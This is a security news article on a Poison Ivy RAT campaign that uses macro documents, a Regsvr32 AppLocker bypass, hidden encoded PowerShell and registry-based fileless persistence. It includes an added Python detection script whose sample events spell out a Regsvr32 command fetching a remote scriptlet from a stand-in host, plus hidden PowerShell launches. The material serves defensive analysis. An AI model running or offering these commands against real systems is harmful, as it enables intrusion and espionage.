Poison Ivy RAT Campaign Leverages New Delivery Techniques

A recently observed campaign using the Poison Ivy remote access tool (RAT) against individuals within the Mongolian government uses publicly available techniques that haven’t been observed in previous campaigns, FireEye reports.

The Poison Ivy backdoor has been around for several years, targeting organizations all around the world, and was associated with a China-linked threat actor known as menuPass, Stone Panda and APT10. The malware packs capabilities such as key logging, screen and video capture, file transfers, password theft, system administration, traffic relaying, and more.

FireEye didn’t attribute the new campaign to a specific actor, and told SecurityWeek in an email that it can’t make direct connections to a particular group at this time. The security firm said it lacks visibility into what the actors did and admitted it doesn’t know if they were successful. Still, the company did say that “espionage is a reasonable assumption for their motives.”

What the newly observed campaign did show, however, was that the actor behind it is up-to-date with recent social engineering and evasion techniques and isn’t shy when it comes to using them. The attacks leveraged an AppLocker bypass that was publicly revealed last year, as well as fileless execution and persistence, and benign documents to minimize user suspicion of malicious activity.

The malware was distributed via Word documents with malicious macros, and the threat actor was using social engineering to trick users into enabling these macros. The malicious documents were delivered via email, claiming to contain instructions for logging into webmail or information regarding a state law proposal, FireEye explains.

The malicious macros in the documents were designed to invoke Regsvr32, a command-line utility designed for registering DLLs in the registry, to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument. This technique was demonstrated last year to effectively bypass AppLocker, the Microsoft application whitelisting solution that prevents unknown executables from running on a system.

In this campaign, the malicious SCT file was designed to invoke WScript to launch PowerShell in hidden mode with an encoded command, FireEye reports. After the PowerShell command is decoded, another layer of PowerShell instructions emerges, serving two purposes: to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet; and to download and run another PowerShell script named f0921.ps1.

The third stage PowerShell script configures an encoded command persistently as a base64 string in the HKCU:\Console\FontSecurity registry key, along with an HKCU\CurrentVersion\Run\SecurityUpdate value to launch the encoded PowerShell payload stored in the previously configured key. Thus, the PowerShell payload is executed every time the user logs in to the system.
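The chain FireEye describes (Regsvr32 fetching a remote scriptlet, a script host spawning hidden PowerShell with an encoded command, and a Run value that pulls its payload out of another registry key) leaves process-creation telemetry at every stage. The following Python is an added example written for this article, not code from FireEye or SecurityWeek: it runs three detections over constructed sample events (the parent/command pairs, the `example.invalid` URL and the decoy path are all made up) and decodes any `-EncodedCommand` argument so an analyst can see the hidden command in clear text.

```python
"""Detection helpers for the regsvr32 -> SCT -> hidden PowerShell -> Run-key chain."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand, so match the short forms too.
ENC_FLAGS = {"-e", "-ec", "-en", "-enc", "-encodedcommand"}


def encode_ps(command: str) -> str:
    """Encode a command the way -EncodedCommand expects it (base64 over UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENC_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify(event: dict) -> list:
    """Return the names of the stages of the chain that one process-creation event matches."""
    cmd, parent = event["cmd"].lower(), event["parent"].lower()
    hits = []
    # Stage 1: regsvr32 told to fetch a scriptlet (SCT) over HTTP via scrobj.dll.
    if "regsvr32" in cmd and "scrobj.dll" in cmd and re.search(r"/i:\s*https?://", cmd):
        hits.append("regsvr32_remote_scriptlet")
    if "powershell" in cmd:
        hidden = re.search(r"-w(indowstyle)?\s+hidden", cmd) is not None
        # Stage 2: the script host started by the SCT launches PowerShell.
        if parent in ("wscript.exe", "cscript.exe"):
            hits.append("script_host_spawns_powershell")
        if hidden and decode_encoded_command(event["cmd"]) is not None:
            hits.append("hidden_encoded_powershell")
        # Stages 3/4: a hidden PowerShell that reads its payload out of a registry value.
        if hidden and re.search(r"hkcu:|hklm:|get-itemproperty|\bgp\b", cmd):
            hits.append("powershell_payload_from_registry")
    return hits


# Constructed sample events modelled on the article's chain (not real campaign data).
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE",
     "cmd": "regsvr32.exe /s /n /u /i:http://example.invalid/s.sct scrobj.dll"},
    {"parent": "wscript.exe",
     "cmd": "powershell.exe -NoP -w hidden -enc "
            + encode_ps(r"Start-Process winword.exe C:\Users\Public\decoy.docx")},
    {"parent": "explorer.exe",  # launched at logon from the Run value (hypothetical key name)
     "cmd": "powershell.exe -w hidden -c (gp HKCU:\\Console).FontSecurity"},
    {"parent": "explorer.exe",  # benign admin script, included for contrast
     "cmd": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
]


def scan(events=SAMPLE_EVENTS) -> dict:
    """Map each matching event index to its detections and the decoded command, if any."""
    findings = {}
    for idx, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            findings[idx] = {"hits": hits, "decoded": decode_encoded_command(ev["cmd"])}
    return findings


if __name__ == "__main__":
    for idx, finding in scan().items():
        print(idx, finding["hits"], finding["decoded"])
```

The benign fourth event shows why the rules key on combinations (hidden window plus an encoded or registry-sourced command, or an unusual parent) rather than on PowerShell alone; feeding real Sysmon Event ID 1 or Windows 4688 records into `classify` only requires mapping their parent and command-line fields onto the same two keys.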

A fourth stage PowerShell script stored in the HKCU:\Console\FontSecurity registry key borrows from the publicly available Inject-LocalShellCode script from PowerSploit to inject shellcode, researchers explain. The shellcode has a custom XOR-based decryption loop that uses a single-byte key (0xD4), and was designed to inject the Poison Ivy backdoor into userinit.exe. The decrypted shellcode also revealed content and configuration related to Poison Ivy.

“Although Poison Ivy has been a proven threat for some time, the delivery mechanism for this backdoor uses recent publicly available techniques that differ from previously observed campaigns. Through the use of PowerShell and publicly available security control bypasses and scripts, most steps in the attack are performed exclusively in memory and leave few forensic artifacts on a compromised host,” FireEye says.

Related: August Stealer Uses PowerShell for Fileless Infection

Related: Windows AppLocker Bypassed to Execute Remote Scripts

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
